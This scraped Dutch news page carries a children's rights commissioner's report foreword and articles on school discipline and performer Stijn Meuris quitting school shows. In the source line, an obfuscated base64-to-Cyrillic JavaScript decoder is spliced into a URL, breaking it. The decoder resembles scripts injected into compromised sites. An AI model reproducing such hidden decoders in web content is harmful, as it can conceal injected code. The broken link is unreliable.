Soms springt de rekker of is hij zo sterk uitgetrok­ken dat alle rek eruit is. Ik zie te veel kinderen bij wie de rek eruit is. Aan die kinderen dragen we dit jaarverslag op. Als je weet dat sommige kin­ deren anderhalf uur heen in de bus naar school zitten en dan dolgedraaid op school aankomen, dan moet je daar iets aan doen. Als je beslist dat kinderen die al tien jaar in België wonen toch het land moeten verlaten en die kinderen verdwijnen in de illegaliteit, dan moet je durven nadenken of hun uitwijzing wel de goede beslis­ sing was. Als kinderen jarenlang slachtoffer zijn van gedwongen prostitutie en van het ene op het andere moment geen dak meer boven hun hoofd hebben, dan is het aan het beleid om voor dat dak – en voor nog zoveel meer – te zorgen. Als kinderen al twee jaar onophoudelijk gepest wor­den en telkens opnieuw te horen krijgen dat ze weerbaarder moeten worden, dan wordt het mis­ schien tijd om als school zelf de rug te rechten en werk te maken van een pestbeleid. Als ouders zo hard met elkaar in een scheidingsknoop liggen dat de jeugdrechter uiteindelijk beslist om hun kinderen in een voorziening te plaatsen, dan is het in de eerste plaats aan die ouders om alterna­ tieven te vinden voor wat hun kinderen ervaren als een ‘dubbele straf’.

Mensen in wording

Niet alleen het kind moet vandaag rekbaar zijn, ook op de kindertijd zelf lijkt steeds meer rek te zitten. De grenzen tussen kind en volwassene vervagen, de strikte scheiding tussen minder­ jarigheid en meerderjarigheid is voorbij. Kinderen mogen vanaf 13 jaar vrij sociale media gebrui­ ken. Steeds meer mensen zijn overtuigd dat stemrecht op 16 een goede zaak zou zijn.

En het volwassen strafrecht zal ook in het nieuwe jeugddelinquentierecht jongeren vanaf 16 jaar kunnen berechten. Omgekeerd zien we pleidooien om jongeren ook nog na 18 in de jeugdhulp te houden. Die dynamieken doen ons nadenken over wie of wat een kind vandaag nog is. En wat de betekenis van kinderrechten nog kan zijn. Kinderen rech­ ten geven is niet hetzelfde als kinderen als vol­ wassenen behandelen. We kunnen kinderrechten niet koppelen aan het beeld van de volwassen, autonome, vrije en rationele mens. Doen we dat wel, dan verbannen we kinderen altijd naar de marges van de samenleving. Kinderen een stem en een plek geven in niet evidente kwesties zoals sociale media en stemrecht, betekent dus hele­ maal geen afscheid van het kind in de samen­ leving. Het betekent integendeel het begin van recht doen aan het verschil. Al deze discussies – hoe verschillend op het eerste gezicht ook – raken een en hetzelfde spanningsveld: kinderen zijn mensen, maar ook altijd mensen in wording. In de virtuele wereld, op school, en dus ook in de rechtbank. Minimum minimorum We vierden dit jaar de twintigste verjaardag van het Kinderrechtencommissariaat. Werken met en voor kinderen en jongeren in maatschappe­ lijk kwetsbare situaties is bijzonder. Het trekt je voortdurend weg uit je eigen leefwereld. Het vraagt kijken en nog eens kijken, veel luisteren en geduld. Het kleurt heel sterk onze blik op de wereld. Net daarom vinden we kinderrechten en mensenrechten als kapstok zo belangrijk. Het kinderrechtenverdrag reikt ons een minimum aan standaarden aan die nodig zijn om alle kin­deren en jongeren tot hun recht te laten komen. Die standaarden vragen keer op keer een gepaste vertaling – geen kind en geen situatie zijn gelijk – maar aan de standaarden op zich valt niet te tornen. Of nog: het kinderrechtenverdrag is geen recepten­boek dat voor elk probleem meteen een geknipt antwoord heeft, maar de basisingrediënten vind je wel terug in elk gerecht dat op tafel komt. Het is vanuit die overtuiging dat we al twintig jaar werken en dat we ook de volgende jaren verder werken. Elk kind heeft het recht om gehoord te worden. Elk kind heeft recht op bescherming van zijn fysieke, psychologische, seksuele en morele integriteit. Elke overheid heeft de plicht de rechten van ieder kind te eerbiedigen en te waarborgen. Zo eenvoudig is dat. En net omdat dit het minimum minimorum is, kun je daar geen millimeter van afwijken.

Bruno Vanobbergen Vlaams kinderrechtencommissaris November 2018

Bron: 

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanden/jaarverslag_krc_2017-2018_webversie_def.pdf">https://www.kinderrechtencommissariaat.be/sites/default/files/bestanden/jaarverslag_krc_2017-2018_webversie_def.pdf

Reacties uitgeschakeld voor De pedagogische opdracht: “Grenzen leren trekken”

De pedagogische opdracht: “Grenzen leren trekken”

Door | 17 november 2018 | Nieuws

De Morgen, 17-11-18, 06.00u – Sofie Mulders
Praten, praten, praten: Peter Adriaenssens weet wat goed is voor de mentale gezondheid van de jeugd

Een op de vijf jongeren kampt met psychische problemen. Leerkrachten kunnen daarbij helpen, maar vooral ouders wacht een belangrijke taak, zegt kinder- en jeugdpsychiater Peter Adriaenssens, peter van de actie Rode Neuzen Dag. “We moeten weer grenzen leren te trekken, zonder tiranniek te zijn.”

Respect is een pedagogische opdracht
De Volkskrant, 22_01-2013,
In Nederland kennen ze het probleem al langer. 5 jaar geleden kwam het debat reeds naar voor omtrent de pedagogische uitdaging die
In preventief opzicht betekent dit dat de school leerlingen moet leren, hoe je een hand geeft, hoe je je excuseert, dat praten effectiever is dan vechten. Dit is de pedagogische opdracht van de school.

Daarnaast moet vooraf worden nagedacht over ongewenst, ontoelaatbaar en grensoverschrijdend gedrag in bijzondere situaties met extra risico's (een schoolreisje, een excursie, een musical, een voetbaltoernooi, een ouderavond enzovoort). De scenario's moeten klaar liggen. De directie moet de leerkrachten in al die gevallen krachtig ruggesteun bieden.

In onderwijs en opvoeding moet er weer een balans komen tussen empathisch optreden (kinderen serieus nemen) en kordaat en consequent optreden.

Reacties uitgeschakeld voor Schoolvoorstelling Stijn Meuris loopt danig fout

Schoolvoorstelling Stijn Meuris loopt danig fout

Door | 15 november 2018 | Nieuws

Stijn Meuris stopt met schoolvoorstellingen na incident: “Tegen framing op social media kan ik niet op”
Performer en muzikant Stijn Meuris heeft zijn boekingskantoor laten weten dat hij geen voorstellingen meer wil doen voor scholen. Dat deed hij na een incident met een middelbare scholier gisteren in Diepenbeek. Meuris zegt dat hij niet opgewassen is tegen de manier waarop dingen escaleren op social media.

Stijn Meuris trekt al enkele jaren rond met de voorstelling “Limburg 1914-1918”, over de Eerste Wereldoorlog. Die heeft hij al een honderdtal keren gespeeld, vooral voor scholen. En daarvoor was er de voorstelling “Stijn en de Sterren” over het heelal, die ook populair was bij scholen. Maar nu geeft Meuris er de brui aan. “Ik kan bijna niet anders," zegt hij aan Radio 2 Limburg. "Het is een heel moeilijk publiek. En de gevolgen van zo'n incident op social media, daar kan ik niet meer tegenop."

Het incident zelf was volgens Meuris "klein maar fel". Het begon toen een tiener met z'n smartphone zat te prutsen tijdens de voorstelling, terwijl vooraf duidelijk gezegd was dat dat niet kon. "Ik heb die jongen, eerst vriendelijk en met humor toegesproken, maar dat escaleerde vrij snel. En ja, ik heb zijn telefoon afgenomen en hem de zaal uitgezet. Maar wat mij vooral overweldigde: de emotionele reacties van de rest van de groep en de gevolgen daarna op social media. Daar word ik echt geframed als een halve zot."

De voorstelling werd uiteindelijk stilgelegd. Daarna is er nog een gesprek geweest met de schooldirectie. Meuris en de jongen hebben ook excuses uitgewisseld. "Ik heb te heftig gereageerd, en ik had zeker niet die smartphone moeten afnemen."

Vanmorgen liet Stijn Meuris dan aan zijn boekingskantoor Koortzz weten dat hij niet meer wil optreden voor schoolgroepen. "Jammer, want we hadden een heel fijn project met meestal goede reacties. Maar deze dingen halen me onderuit en nu kom ik erachter als volwassen mens en als performer dat ik hier niet meer tegenop kan."

"Ik hoor het ook van andere artiesten, die bijvoorbeeld schooltheater doen. Die zeggen me ook hoe voorzichtig je moet zijn, hoe je op je hoede moet zijn met alles wat je zegt en hoe je vaak alleen staat in een frontlijn voor tieners. Ik heb hier echt geen zin meer in."
Incident gesloten
De tournee van "Limburg 1914-1918" werd mee georganiseerd door de provincie Limburg. In een persbericht zegt het provinciebestuur dat wat hen betreft het incident gesloten is. "We betreuren dit voorval. Na de voorstelling heeft Stijn Meuris zich verontschuldigd bij de leerlingen via de directie van de school en het schoolbestuur. Vanochtend had hij hierover een uitvoerig gesprek met gedeputeerde van onderwijs Jean-Paul Peuskens, waarin hij tevens zijn verontschuldigingen aanbood. Hiermee is voor ons het incident gesloten."

1 2 3 24